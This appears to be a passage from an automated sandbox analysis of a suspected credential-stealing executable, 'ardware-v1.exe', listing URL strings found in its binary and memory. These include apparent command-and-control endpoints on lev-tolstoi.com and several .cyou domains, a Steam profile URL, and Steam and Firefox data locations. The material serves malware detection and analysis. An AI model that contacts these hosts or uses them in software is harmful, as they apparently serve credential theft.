                Source: ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.0000000001054000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632953402.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632755180.0000000001085000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: ardware-v1.exe, 00000000.00000002.2632953402.00000000010CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/.$Hwl
                Source: ardware-v1.exe, 00000000.00000002.2632519003.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/900
                Source: ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/=
                Source: ardware-v1.exe, 00000000.00000002.2632953402.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542434664.0000000001052000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542434664.0000000001085000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632755180.0000000001085000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: ardware-v1.exe, 00000000.00000003.2422428346.0000000001049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api%
                Source: ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api8x
                Source: ardware-v1.exe, 00000000.00000003.2517557532.0000000001085000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiR8
                Source: ardware-v1.exe, 00000000.00000003.2542434664.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apim
                Source: ardware-v1.exe, 00000000.00000002.2632953402.00000000010CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apimSvx
                Source: ardware-v1.exe, 00000000.00000003.2561356645.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2561005815.00000000010C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apis
                Source: ardware-v1.exe, 00000000.00000003.2397173841.0000000001049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apit8
                Source: ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apitn
                Source: ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/avatar
                Source: ardware-v1.exe, 00000000.00000003.2543085996.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2561356645.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542350182.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2561005815.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543259774.00000000010D2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632953402.00000000010CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/d
                Source: ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/e&quot
                Source: ardware-v1.exe, 00000000.00000003.2543085996.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542350182.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543259774.00000000010D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/er
                Source: ardware-v1.exe, 00000000.00000003.2543085996.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542350182.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543259774.00000000010D2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632953402.00000000010CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pxT
                Source: ardware-v1.exe, 00000000.00000003.2561356645.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2561005815.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632953402.00000000010CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/t8x
                Source: ardware-v1.exe, 00000000.00000002.2632953402.00000000010CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/xt
                Source: ardware-v1.exe, 00000000.00000003.2561356645.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2561005815.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632953402.00000000010CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/xx
                Source: ardware-v1.exe, 00000000.00000002.2632519003.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api
                Source: ardware-v1.exe, 00000000.00000002.2632519003.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apil
                Source: ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542434664.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605522749.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632859717.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397173841.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605680840.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520849640.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: ardware-v1.exe, 00000000.00000003.2397173841.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542434664.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605522749.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632859717.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397173841.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605680840.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520849640.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: ardware-v1.exeString found in binary or memory: https://sectigo.com/CPS0
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: ardware-v1.exe, 00000000.00000003.2397173841.0000000001057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sordid-snaked.cyou/api
                Source: ardware-v1.exe, 00000000.00000003.2397173841.0000000001057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sordid-snaked.cyou/api7
                Source: ardware-v1.exe, 00000000.00000003.2331449931.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spend-shiny.cyou:443/api
                Source: ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542434664.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605522749.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632859717.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397173841.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605680840.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520849640.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520849640.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: ardware-v1.exe, 00000000.00000003.2397173841.000000000103D000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: ardware-v1.exe, 00000000.00000003.2543085996.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2521182506.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2561356645.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542350182.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2561005815.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520772044.00000000010C0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632953402.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520811378.00000000010CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampow
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520849640.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: ardware-v1.exe, 00000000.00000003.2486573768.0000000003975000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: ardware-v1.exe, 00000000.00000003.2486573768.0000000003975000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: ardware-v1.exe, 00000000.00000003.2397173841.0000000001057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/
                Source: ardware-v1.exe, 00000000.00000003.2397173841.0000000001057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/P:
                Source: ardware-v1.exe, 00000000.00000003.2397173841.0000000001057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/api
                Source: ardware-v1.exe, 00000000.00000003.2397173841.0000000001057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/pi
                Source: ardware-v1.exe, 00000000.00000003.2517406456.0000000003873000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
                Source: ardware-v1.exe, 00000000.00000003.2426252884.0000000003889000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426550854.0000000003886000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426325634.0000000003886000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: ardware-v1.exe, 00000000.00000003.2426252884.0000000003889000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426550854.0000000003886000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426325634.0000000003886000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542434664.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605522749.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632859717.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397173841.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605680840.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520849640.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542434664.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605522749.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632859717.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397173841.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605680840.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520849640.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                Source: ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542434664.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605522749.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632859717.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397173841.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605680840.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520849640.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: ardware-v1.exe, 00000000.00000003.2517406456.0000000003873000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: ardware-v1.exe, 00000000.00000003.2486268769.00000000038A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                Source: ardware-v1.exe, 00000000.00000003.2486573768.0000000003975000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
                Source: ardware-v1.exe, 00000000.00000003.2486573768.0000000003975000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
                Source: ardware-v1.exe, 00000000.00000003.2486573768.0000000003975000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: ardware-v1.exe, 00000000.00000003.2486573768.0000000003975000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: ardware-v1.exeString found in binary or memory: https://www.ssl.com/repository0
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
